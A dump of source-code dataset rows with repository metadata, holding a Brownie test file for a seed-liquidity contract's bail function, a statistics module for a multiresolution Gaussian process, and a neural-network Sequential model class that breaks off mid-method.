| 0.776406
| 604
| 5,993
| 7.610927
| 0.124172
| 0.234936
| 0.040679
| 0.062867
| 0.841853
| 0.840983
| 0.807918
| 0.78486
| 0.78486
| 0.78486
| 0
| 0.000185
| 0.100451
| 5,993
| 103
| 245
| 58.184466
| 0.852532
| 0.347572
| 0
| 0.25
| 0
| 0
| 0.087417
| 0.058016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019231
| false
| 0
| 0.076923
| 0
| 0.326923
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
795aca3bd791cdcef8635e8c9a29afeba89d6acb
| 2,532
|
py
|
Python
|
tests/test_bail.py
|
1Blackdiamondsc/seed-liquidity
|
91e08c1a0bfa8115db38a23d236c22dcddf039af
|
[
"MIT"
] | 55
|
2020-12-18T15:34:11.000Z
|
2022-03-27T12:50:09.000Z
|
tests/test_bail.py
|
1Blackdiamondsc/seed-liquidity
|
91e08c1a0bfa8115db38a23d236c22dcddf039af
|
[
"MIT"
] | null | null | null |
tests/test_bail.py
|
1Blackdiamondsc/seed-liquidity
|
91e08c1a0bfa8115db38a23d236c22dcddf039af
|
[
"MIT"
] | 17
|
2020-12-18T14:36:32.000Z
|
2022-02-10T17:41:12.000Z
|
import brownie
def test_bail_seed_running(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
with brownie.reverts():
seed.bail({'from': agent})
with brownie.reverts():
seed.bail({'from': whale})
def test_bail_targets_met_expired(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
def test_bail_targets_not_met(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)//2
weth_amount = seed.target(1)*3//4
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
with brownie.reverts():
seed.provide()
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
def test_bail_targets_met_expired_multi_deposit(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount//2, 0], {'from': agent})
seed.deposit([lido_amount//2, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount//4], {'from': whale})
seed.deposit([0, weth_amount//4], {'from': whale})
seed.deposit([0, weth_amount//4], {'from': whale})
seed.deposit([0, weth_amount//4], {'from': whale})
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
| 29.44186
| 87
| 0.657583
| 345
| 2,532
| 4.66087
| 0.104348
| 0.099502
| 0.068408
| 0.069652
| 0.954602
| 0.941542
| 0.894279
| 0.894279
| 0.873756
| 0.873756
| 0
| 0.02419
| 0.183649
| 2,532
| 86
| 88
| 29.44186
| 0.753749
| 0
| 0
| 0.866667
| 0
| 0
| 0.031583
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.066667
| false
| 0
| 0.016667
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8dbfe3713d63847ad2350264da0aea47929c6753
| 20,051
|
py
|
Python
|
src/Stats.py
|
jtaghia/MRGP
|
92891dfb74e4322341ac3e7774d98eeb557ab215
|
[
"MIT"
] | 1
|
2021-05-27T09:31:48.000Z
|
2021-05-27T09:31:48.000Z
|
src/Stats.py
|
jtaghia/MRGP
|
92891dfb74e4322341ac3e7774d98eeb557ab215
|
[
"MIT"
] | 2
|
2021-07-14T03:36:11.000Z
|
2021-07-14T03:40:00.000Z
|
src/Stats.py
|
jtaghia/MRGP
|
92891dfb74e4322341ac3e7774d98eeb557ab215
|
[
"MIT"
] | 1
|
2021-07-12T21:08:44.000Z
|
2021-07-12T21:08:44.000Z
|
import numpy as np
from scipy.special import psi, gammaln
from scipy.optimize import fsolve
from scipy.misc import logsumexp
class Stats(object):
def __init__(self, posterior):
qd = posterior
self.noise_region_specific = qd.noise_region_specific
self.bias_region_specific = qd.bias_region_specific
self.latent_f_mean = None
self.latent_f_var = None
self.n_basis = qd.n_basis
self.dy = qd.dy
self.n_regions = qd.n_regions
# SCALE
self.scale_axis_mean = []
self.scale_moment2 = []
self.scale_axis_central_moment2 = []
for l in range(self.n_regions):
self.scale_axis_mean.append(np.zeros((self.dy, self.n_basis)))
self.scale_moment2.append(np.zeros(self.n_basis))
self.scale_axis_central_moment2.append(np.zeros(self.n_basis))
# NOISE
if qd.noise_region_specific is True:
self.noise_mean = []
self.noise_log_mean = []
for l in range(self.n_regions):
self.noise_mean.append(qd.noise_gamma_shape[l]/qd.noise_gamma_scale[l])
self.noise_log_mean.append(psi(qd.noise_gamma_shape[l]) - np.log(qd.noise_gamma_scale[l]))
elif qd.noise_region_specific is False:
self.noise_mean = qd.noise_gamma_shape/qd.noise_gamma_scale
self.noise_log_mean = psi(qd.noise_gamma_shape) - np.log(qd.noise_gamma_scale)
else:
raise TypeError('noise_region_specific condition can be either True or False!')
# BIAS
if qd.bias_region_specific is True:
self.bias_mean = []
self.bias_var = []
for l in range(self.n_regions):
self.bias_mean.append(qd.bias_normal_mean[l])
self.bias_var.append(qd.bias_normal_precision[l]**-1)
elif qd.bias_region_specific is False:
self.bias_mean = qd.bias_normal_mean
self.bias_var = qd.bias_normal_precision**-1
else:
raise TypeError('bias_region_specific condition can be either True or False!')
# LATENT FUNCTIONS
def initialize_latent_functions(self, n_samps):
self.latent_f_mean = []
self.latent_f_var = []
for l in range(self.n_regions):
self.latent_f_mean.append(np.zeros((n_samps[l], self.dy)))
self.latent_f_var.append(np.zeros(n_samps[l]))
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
def update_scale(self, posterior, stats):
self._update_scale_axis_mean(posterior, stats)
self._update_scale_moment2(posterior, stats)
self._update_scale_axis_central_moment2(posterior, stats)
def _update_scale_axis_mean(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
self.scale_axis_mean[l][:, i] = qd.scale_mean_zeta[l][i] * \
np.dot(axis_cov[i, :, :], qd.scale_mean_y_tilde[l][:, i])
def _update_scale_moment2(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
zeta2 = qd.scale_mean_zeta[l][i]**2
y_tilde_il = qd.scale_mean_y_tilde[l][:, i]
self.scale_moment2[l][i] = (1/qd.scale_precision[l][i]) + \
(zeta2 * np.trace(np.dot(np.outer(y_tilde_il, y_tilde_il), axis_cov[i, :, :])))
def _update_scale_axis_central_moment2(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
term_ = axis_cov[i, :, :] - np.dot(axis_cov[i, :, :], axis_cov[i, :, :])
zeta2 = qd.scale_mean_zeta[l][i]**2
y_tilde_il = qd.scale_mean_y_tilde[l][:, i]
yy_tilde = np.outer(y_tilde_il, y_tilde_il)
self.scale_axis_central_moment2[l][i] = (1/qd.scale_precision[l][i]) + \
(zeta2 * np.trace(np.dot(yy_tilde, term_)))
def update_noise(self, posterior):
qd = posterior
if qd.noise_region_specific is True:
for l in range(self.n_regions):
self.noise_mean[l] = qd.noise_gamma_shape[l]/qd.noise_gamma_scale[l]
self.noise_log_mean[l] = psi(qd.noise_gamma_shape[l]) - np.log(qd.noise_gamma_scale[l])
elif qd.noise_region_specific is False:
self.noise_mean = qd.noise_gamma_shape/qd.noise_gamma_scale
self.noise_log_mean = psi(qd.noise_gamma_shape) - np.log(qd.noise_gamma_scale)
else:
raise TypeError('Unsupported condition for noise_region_specific.')
def update_bias(self, posterior):
qd = posterior
if qd.bias_region_specific is True:
for l in range(self.n_regions):
self.bias_mean[l] = qd.bias_normal_mean[l]
self.bias_var[l] = qd.bias_normal_precision[l]**-1
elif qd.bias_region_specific is False:
self.bias_mean = qd.bias_normal_mean
self.bias_var = qd.bias_normal_precision**-1
else:
raise TypeError('Unsupported condition for bias_region_specific.')
def update_latent_functions(self, resolution, index_set, stats, phi_x):
n_samps_0 = len(index_set[0][0])
latent_f_mean = np.zeros((n_samps_0, self.dy))
latent_f_var = np.zeros(n_samps_0)
# TODO: which one?
for jp in range(resolution):
stats_jp = stats[jp]
phi_x_jp = phi_x[jp]
latent_f_mean_temp = []
latent_f_var_temp = []
for l in range(stats_jp.n_regions):
if stats_jp.bias_region_specific is True:
bias_mean = stats_jp.bias_mean[l]
bias_var = stats_jp.bias_var[l]
else:
bias_mean = stats_jp.bias_mean
bias_var = stats_jp.bias_var
n_samps = phi_x_jp[l].shape[0]
sum_term_mean = np.zeros((n_samps, stats_jp.dy))
sum_term_var = np.zeros(n_samps)
for i in range(self.n_basis):
sum_term_mean += stats_jp.scale_axis_mean[l][:, i] * \
np.tile(phi_x_jp[l][:, i], (self.dy, 1)).T
sum_term_var += (phi_x_jp[l][:, i]**2) * stats_jp.scale_axis_central_moment2[l][i]
latent_f_mean_temp.append(bias_mean + sum_term_mean)
latent_f_var_temp.append(bias_var + sum_term_var)
latent_f_mean += np.concatenate(latent_f_mean_temp)
latent_f_var += np.concatenate(latent_f_var_temp)
latent_f_var = np.atleast_2d(latent_f_var).T
for region in range(len(index_set[resolution])):
self.latent_f_mean[region] = latent_f_mean[index_set[resolution][region], :]
self.latent_f_var[region] = latent_f_var[index_set[resolution][region], :]
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
class IndependentStats(object):
def __init__(self, posterior):
qd = posterior
self.n_basis = qd.n_basis
self.dy = qd.dy
self.n_regions = qd.n_regions
# AXIS
self.axis_cov = []
for l in range(self.n_regions):
self.axis_cov.append(np.zeros((self.n_basis, self.dy, self.dy)))
# ARD
self.ard_mean = []
self.ard_log_mean = []
for l in range(self.n_regions):
self.ard_mean.append(qd.ard_gamma_shape[l] / qd.ard_gamma_scale[l])
self.ard_log_mean.append(psi(qd.ard_gamma_shape[l]) - np.log(qd.ard_gamma_scale[l]))
# PERMUTATION ALIGNMENT
self.omega = []
for l in range(self.n_regions):
self.omega.append(np.ones((self.n_basis, self.n_basis)) / self.n_basis)
self.noise_region_specific = qd.noise_region_specific
self.bias_region_specific = qd.bias_region_specific
self.latent_f_mean = None
self.latent_f_var = None
# SCALE
self.scale_axis_mean = []
self.scale_moment2 = []
self.scale_axis_central_moment2 = []
for l in range(self.n_regions):
self.scale_axis_mean.append(np.zeros((self.dy, self.n_basis)))
self.scale_moment2.append(np.zeros(self.n_basis))
self.scale_axis_central_moment2.append(np.zeros(self.n_basis))
# NOISE
if qd.noise_region_specific is True:
self.noise_mean = []
self.noise_log_mean = []
for l in range(self.n_regions):
self.noise_mean.append(qd.noise_gamma_shape[l]/qd.noise_gamma_scale[l])
self.noise_log_mean.append(psi(qd.noise_gamma_shape[l]) - np.log(qd.noise_gamma_scale[l]))
elif qd.noise_region_specific is False:
self.noise_mean = qd.noise_gamma_shape/qd.noise_gamma_scale
self.noise_log_mean = psi(qd.noise_gamma_shape) - np.log(qd.noise_gamma_scale)
else:
raise TypeError('noise_region_specific condition can be either True or False!')
# BIAS
if qd.bias_region_specific is True:
self.bias_mean = []
self.bias_var = []
for l in range(self.n_regions):
self.bias_mean.append(qd.bias_normal_mean[l])
self.bias_var.append(qd.bias_normal_precision[l]**-1)
elif qd.bias_region_specific is False:
self.bias_mean = qd.bias_normal_mean
self.bias_var = qd.bias_normal_precision**-1
else:
raise TypeError('bias_region_specific condition can be either True or False!')
# LATENT FUNCTIONS
def initialize_latent_functions(self, n_samps):
self.latent_f_mean = []
self.latent_f_var = []
for l in range(self.n_regions):
self.latent_f_mean.append(np.zeros((n_samps[l], self.dy)))
self.latent_f_var.append(np.zeros(n_samps[l]))
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# UPDATE AXIS
def update_axis(self, posterior):
qd = posterior
for l in range(self.n_regions):
for i in range(self.n_basis):
sum_d = np.zeros((self.dy, self.dy))
for d in range(self.dy):
sum_d += qd.axis_bingham_rho[l][i, d] * \
np.outer(qd.axis_bingham_axes[l][i, :, d], qd.axis_bingham_axes[l][i, :, d])
self.axis_cov[l][i, :, :] = sum_d
# UPDATE ARD
def update_ard(self, posterior):
qd = posterior
for l in range(self.n_regions):
self.ard_mean[l] = qd.ard_gamma_shape[l]/qd.ard_gamma_scale[l]
self.ard_log_mean[l] = psi(qd.ard_gamma_shape[l]) - np.log(qd.ard_gamma_scale[l])
def update_scale(self, posterior, stats):
self._update_scale_axis_mean(posterior, stats)
self._update_scale_moment2(posterior, stats)
self._update_scale_axis_central_moment2(posterior, stats)
def _update_scale_axis_mean(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
self.scale_axis_mean[l][:, i] = qd.scale_mean_zeta[l][i] * \
np.dot(axis_cov[l][i, :, :], qd.scale_mean_y_tilde[l][:, i])
def _update_scale_moment2(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
zeta2 = qd.scale_mean_zeta[l][i]**2
y_tilde_il = qd.scale_mean_y_tilde[l][:, i]
self.scale_moment2[l][i] = (1/qd.scale_precision[l][i]) + \
(zeta2 * np.trace(np.dot(np.outer(y_tilde_il, y_tilde_il), axis_cov[l][i, :, :])))
def _update_scale_axis_central_moment2(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
term_ = axis_cov[l][i, :, :] - np.dot(axis_cov[l][i, :, :], axis_cov[l][i, :, :])
zeta2 = qd.scale_mean_zeta[l][i]**2
y_tilde_il = qd.scale_mean_y_tilde[l][:, i]
yy_tilde = np.outer(y_tilde_il, y_tilde_il)
self.scale_axis_central_moment2[l][i] = (1/qd.scale_precision[l][i]) + \
(zeta2 * np.trace(np.dot(yy_tilde, term_)))
def update_noise(self, posterior):
qd = posterior
if qd.noise_region_specific is True:
for l in range(self.n_regions):
self.noise_mean[l] = qd.noise_gamma_shape[l]/qd.noise_gamma_scale[l]
self.noise_log_mean[l] = psi(qd.noise_gamma_shape[l]) - np.log(qd.noise_gamma_scale[l])
elif qd.noise_region_specific is False:
self.noise_mean = qd.noise_gamma_shape/qd.noise_gamma_scale
self.noise_log_mean = psi(qd.noise_gamma_shape) - np.log(qd.noise_gamma_scale)
else:
raise TypeError('Unsupported condition for noise_region_specific.')
def update_bias(self, posterior):
qd = posterior
if qd.bias_region_specific is True:
for l in range(self.n_regions):
self.bias_mean[l] = qd.bias_normal_mean[l]
self.bias_var[l] = qd.bias_normal_precision[l]**-1
elif qd.bias_region_specific is False:
self.bias_mean = qd.bias_normal_mean
self.bias_var = qd.bias_normal_precision**-1
else:
raise TypeError('Unsupported condition for bias_region_specific.')
def update_latent_functions(self, resolution, index_set, stats, phi_x):
# if resolution > 0:
n_samps_0 = len(index_set[0][0])
latent_f_mean = np.zeros((n_samps_0, self.dy))
latent_f_var = np.zeros(n_samps_0)
# TODO: which one?
for jp in range(resolution):
stats_jp = stats[jp]
phi_x_jp = phi_x[jp]
latent_f_mean_temp = []
latent_f_var_temp = []
for l in range(stats_jp.n_regions):
if stats_jp.bias_region_specific is True:
bias_mean = stats_jp.bias_mean[l]
bias_var = stats_jp.bias_var[l]
else:
bias_mean = stats_jp.bias_mean
bias_var = stats_jp.bias_var
n_samps = phi_x_jp[l].shape[0]
sum_term_mean = np.zeros((n_samps, stats_jp.dy))
sum_term_var = np.zeros(n_samps)
for i in range(self.n_basis):
sum_term_mean += stats_jp.scale_axis_mean[l][:, i] * \
np.tile(phi_x_jp[l][:, i], (self.dy, 1)).T
sum_term_var += (phi_x_jp[l][:, i]**2) * stats_jp.scale_axis_central_moment2[l][i]
latent_f_mean_temp.append(bias_mean + sum_term_mean)
latent_f_var_temp.append(bias_var + sum_term_var)
latent_f_mean += np.concatenate(latent_f_mean_temp)
latent_f_var += np.concatenate(latent_f_var_temp)
latent_f_var = np.atleast_2d(latent_f_var).T
for region in range(len(index_set[resolution])):
self.latent_f_mean[region] = latent_f_mean[index_set[resolution][region], :]
self.latent_f_var[region] = latent_f_var[index_set[resolution][region], :]
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
class SharedStats(object):
def __init__(self, posterior):
qd = posterior
self.n_basis = qd.n_basis
self.dy = qd.dy
# AXIS
self.axis_cov = np.zeros((self.n_basis, self.dy, self.dy))
self.axis_cov = np.zeros((self.n_basis, self.dy, self.dy))
# ARD
self.ard_mean = qd.ard_gamma_shape/qd.ard_gamma_scale
self.ard_log_mean = psi(qd.ard_gamma_shape) - np.log(qd.ard_gamma_scale)
# PERMUTATION ALIGNMENT
self.omega = np.ones((self.n_basis, self.n_basis))/self.n_basis
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# UPDATE AXIS
def update_axis(self, posterior):
qd = posterior
for i in range(self.n_basis):
sum_d = np.zeros((self.dy, self.dy))
for d in range(self.dy):
sum_d += qd.axis_bingham_rho[i, d] * \
np.outer(qd.axis_bingham_axes[i, :, d], qd.axis_bingham_axes[i, :, d])
self.axis_cov[i, :, :] = sum_d
# UPDATE ARD
def update_ard(self, posterior):
qd = posterior
self.ard_mean = qd.ard_gamma_shape/qd.ard_gamma_scale
self.ard_log_mean = psi(qd.ard_gamma_shape) - np.log(qd.ard_gamma_scale)
def update_omega(self, prior, stats):
b_prime = prior.axis_bingham_b
log_const_prime = prior.axis_bingham_log_const
axis_cov = stats.axis_cov
ard_shape_prime = prior.ard_gamma_shape
ard_scale_prime = prior.ard_gamma_scale
ard_log_mean = stats.ard_log_mean
ard_mean = stats.ard_mean
self.omega = self._get_omega(b_prime, log_const_prime, ard_shape_prime, ard_scale_prime,
axis_cov, ard_log_mean, ard_mean, self.n_basis)
# UPDATE PERMUTATION
@staticmethod
def _get_omega(B_prime, log_const_prime, ard_shape_prime, ard_scale_prime, axis_cov, ard_log_mean,
ard_mean, n_basis):
log_omega_hat = np.zeros((n_basis, n_basis))
for i in range(n_basis):
for k in range(n_basis):
term1 = np.trace(np.dot(axis_cov[i, :, :], B_prime[k, :, :]))
log_omega_hat[i, k] = term1 - log_const_prime[k] \
+ ard_shape_prime[k]*np.log(ard_scale_prime[k]) - gammaln(ard_shape_prime[k]) \
+ (ard_shape_prime[k] - 1)*ard_log_mean[i] \
- ard_scale_prime[k] * ard_mean[i]
ln_eta_hat = fsolve(_func_omega, np.zeros(2*n_basis), log_omega_hat)
omega = np.zeros((n_basis, n_basis))
for i in range(n_basis):
ln_alpha_hat = ln_eta_hat[0:n_basis]
ln_beta_hat = ln_eta_hat[n_basis: 2*n_basis]
for k in range(n_basis):
omega[i, k] = np.exp(ln_alpha_hat[i] + ln_beta_hat[k] + log_omega_hat[i, k])
return omega
def _func_omega(ln_eta, ln_omega):
n_basis = ln_omega.shape[0]
ln_alpha = ln_eta[0:n_basis]
ln_beta = ln_eta[n_basis: 2*n_basis]
ln_a = []
for k in range(n_basis):
ln_a_k = np.zeros(n_basis)
for i in range(n_basis):
ln_a_k[i] = ln_alpha[i] + ln_omega[i, k]
ln_a.append(ln_a_k)
ln_b = []
for i in range(n_basis):
ln_b_i = np.zeros(n_basis)
for k in range(n_basis):
ln_b_i[k] = ln_beta[k] + ln_omega[i, k]
ln_b.append(ln_b_i)
out = []
for l in range(n_basis):
out.append(ln_alpha[l] + logsumexp(ln_b[l]))
out.append(ln_beta[l] + logsumexp(ln_a[l]))
return out
| 43.306695
| 108
| 0.567254
| 2,781
| 20,051
| 3.756562
| 0.046027
| 0.026802
| 0.036853
| 0.037906
| 0.913564
| 0.894898
| 0.885039
| 0.877668
| 0.858524
| 0.853068
| 0
| 0.005117
| 0.278689
| 20,051
| 462
| 109
| 43.400433
| 0.717209
| 0.065882
| 0
| 0.802228
| 0
| 0
| 0.022915
| 0.006853
| 0
| 0
| 0
| 0.002165
| 0
| 1
| 0.072423
| false
| 0
| 0.011142
| 0
| 0.097493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8dc47ec5b9d6ab433a154ef1dd25f32a073f7f13
| 21,006
|
py
|
Python
|
models.py
|
eLeVeNnN/shinnosuke
|
0e07273991fbf6231aea084f490826883f562d0e
|
[
"MIT"
] | 24
|
2019-08-19T08:57:50.000Z
|
2020-07-06T06:31:38.000Z
|
models.py
|
E1eveNn/shinnosuke
|
0e07273991fbf6231aea084f490826883f562d0e
|
[
"MIT"
] | 1
|
2019-08-24T02:56:30.000Z
|
2019-08-24T02:56:30.000Z
|
models.py
|
E1eveNn/shinnosuke
|
0e07273991fbf6231aea084f490826883f562d0e
|
[
"MIT"
] | 1
|
2020-04-22T18:53:52.000Z
|
2020-04-22T18:53:52.000Z
|
from .utils.Objectives import get_objective
from .utils.Optimizers import get_optimizer
from .utils.MiniBatch import get_batches
import time
import matplotlib.pyplot as plt
import os
import pickle
class Sequential():
def __init__(self,layers=None):
self.layers=[] if layers is None else layers
self.train_loss=[]
self.train_acc=[]
self.valid_loss=[]
self.valid_acc=[]
self.process_bar_nums=30
self.process_bar_trained='='
self.process_bar_untrain='*'
def add(self,layer):
self.layers.append(layer)
def compile(self,optimizer,loss):
assert self.layers
trainable_variables=[]
# self.layers[0].first_layer=True
next_layer=None
for layer in self.layers:
layer.connect(next_layer)
next_layer=layer
for var in layer.variables:
if var.require_grads:
trainable_variables.append(var)
self.trainable_variables=trainable_variables
self.loss=get_objective(loss)
self.optimizer=get_optimizer(optimizer)
def fit(self,X,Y,batch_size=64,epochs=20,shuffle=True,validation_data=None,validation_ratio=0.1,draw_acc_loss=False,draw_save_path=None):
if validation_data is None:
if 0.<validation_ratio<1.:
split=int(X.shape[0]*validation_ratio)
valid_X,valid_Y=X[-split:],Y[-split:]
train_X,train_Y=X[:-split],Y[:-split]
validation_data=(valid_X,valid_Y)
else:
train_X, train_Y = X, Y
else:
valid_X, valid_Y=validation_data
train_X,train_Y=X,Y
for epoch in range(epochs):
mini_batches=get_batches(train_X,train_Y,batch_size,epoch,shuffle)
batch_nums=len(mini_batches)
training_size=train_X.shape[0]
batch_count=0
trained_nums=0
print('\033[0;31m Epoch[%d/%d]' % (epoch + 1, epochs))
start_time = time.time()
for xs,ys in mini_batches:
batch_count+=1
trained_nums+=xs.shape[0]
#forward
y_hat=self.predict(xs)
#backward
self.layers[-1].grads = self.loss.backward(y_hat, ys)
for layer in reversed(self.layers):
layer.backward()
end_time = time.time()
gap = end_time - start_time
self.optimizer.update(self.trainable_variables)
batch_acc, batch_loss = self.__evaluate(y_hat, ys)
self.train_loss.append(batch_loss)
self.train_acc.append(batch_acc)
if validation_data is not None:
valid_acc, valid_loss = self.evaluate(valid_X, valid_Y,batch_size=batch_size)
self.valid_loss.append(valid_loss)
self.valid_acc.append(valid_acc)
if draw_acc_loss:
if len(self.train_loss)==2:
plt.ion()
plt.figure(figsize=(6, 7))
plt.title('batch-size='+str(batch_size)+',Epochs='+str(epochs))
ax1 = plt.subplot(2, 1, 1)
ax2 = plt.subplot(2, 1, 2)
if len(self.train_loss)>1:
self.draw_training(ax1,ax2,draw_save_path,epoch)
trained_process_bar_nums=batch_count*self.process_bar_nums//batch_nums
process_bar=self.process_bar_trained*trained_process_bar_nums+'>'+self.process_bar_untrain*(self.process_bar_nums-trained_process_bar_nums-1)
if validation_data is not None:
print(
'\r{:d}/{:d} [{}] -{:.0f}s -{:.0f}ms/batch -batch_loss: {:.4f} -batch_acc: {:.4f} -val_loss: {:.4f} -val_acc: {:.4f}'.format(trained_nums, training_size, process_bar, gap, gap*1000 / batch_count,batch_loss, batch_acc, valid_loss, valid_acc), end='')
else:
print('\r{:d}/{:d} [{}] -{:.0f}s -{:.0f}ms/batch -batch_loss: {:.4f} -batch_acc: {:.4f} '.format( trained_nums, training_size, process_bar, gap, gap * 1000 / batch_count,batch_loss, batch_acc), end='')
print()
def predict(self,X,is_training=True):
self.layers[0].input_tensor=X
for layer in self.layers:
layer.forward(is_training=is_training)
y_hat=self.layers[-1].output_tensor
return y_hat
def __evaluate(self,y_hat,y_true):
acc = self.loss.calc_acc(y_hat,y_true)
base_loss = self.loss.calc_loss(y_hat, y_true)
return acc,base_loss
def evaluate(self, X, Y, batch_size=None):
if batch_size is not None:
assert type(batch_size) is int
ep = 0
acc_list = []
loss_list = []
data_nums = X.shape[0]
while True:
sp = ep
ep = min(sp + batch_size, data_nums)
y_hat = self.predict(X[sp:ep], is_training=False)
acc = self.loss.calc_acc(y_hat,Y[sp:ep])
acc_list.append(acc)
base_loss = self.loss.calc_loss(y_hat, Y[sp:ep])
loss_list.append(base_loss)
if ep == data_nums:
acc = sum(acc_list) / len(acc_list)
base_loss = sum(loss_list) / len(loss_list)
break
else:
y_hat = self.predict(X, is_training=False)
acc = self.loss.calc_acc(y_hat,Y)
base_loss = self.loss.calc_loss(y_hat, Y)
regular_loss = 0
# for layer in self.layers:
# regular_loss+=layer.add_loss
return acc, base_loss
def draw_training(self,ax1,ax2,draw_save_path,epoch):
leg1=ax1.get_legend()
ax1.plot(self.train_loss, color='blue', label='train')
if self.valid_loss:
ax1.plot(self.valid_loss, color='green', label='validation')
ax1.set_xlabel('iter')
ax1.set_ylabel('loss')
if leg1 is None:
ax1.legend(loc='best')
leg2 = ax2.get_legend()
ax2.plot(self.train_acc, color='red', label='train')
if self.valid_acc:
ax2.plot(self.valid_acc, color='yellow', label='validation')
ax2.set_xlabel('iter')
ax2.set_ylabel('acc')
if leg2 is None:
ax2.legend(loc='best')
plt.pause(0.1)
if draw_save_path is not None:
assert draw_save_path.__class__.__name__=='str'
draw_save_path=os.path.abspath(draw_save_path+'\\Epoch'+str(epoch))
plt.savefig(draw_save_path,dpi=300)
def pop(self,index=-1):
layer=self.layers.pop(index)
del layer
print('success delete %s layer'%(layer.__class__.__name__))
def save(self,save_path):
with open(save_path+'.pkl','wb') as f:
pickle.dump([self.layers,self.optimizer,self.loss],f)
def load(self,model_path):
with open(model_path + '.pkl', 'rb') as f:
layers,optimizer,loss = pickle.load(f)
self.layers=layers
self.optimizer=optimizer
self.loss=loss
def __str__(self):
bar_nums = 75
print('*' * bar_nums)
print('Layer(type)'.ljust(20),'Output Shape'.ljust(20) ,'Param'.ljust(12),'Connected to'.ljust(15))
print('#' * bar_nums)
total_params = 0
for layer in self.layers:
if layer.name is not None:
layer_name = '%s (%s)'%(layer.name,layer.__class__.__name__)
else:
layer_name = str(layer.__class__.__name__)
params = layer.params_count()
total_params += params
first = True
if layer.inbounds:
for prev_layer in layer.inbounds:
if prev_layer.name is not None:
connected = prev_layer.name
else:
connected = prev_layer.__class__.__name__
if first:
print(layer_name.ljust(20),str(layer.output_shape).ljust(20), str(params).ljust(12),connected.ljust(15))
first = False
else:
print(''.ljust(20),''.ljust(20), ''.ljust(12),connected.ljust(15))
else:
connected = '\n'
print(layer_name.ljust(20),str(layer.output_shape).ljust(20), str(params).ljust(12),connected.ljust(15))
print('-' * bar_nums)
print('*' * bar_nums)
trainable_params = 0
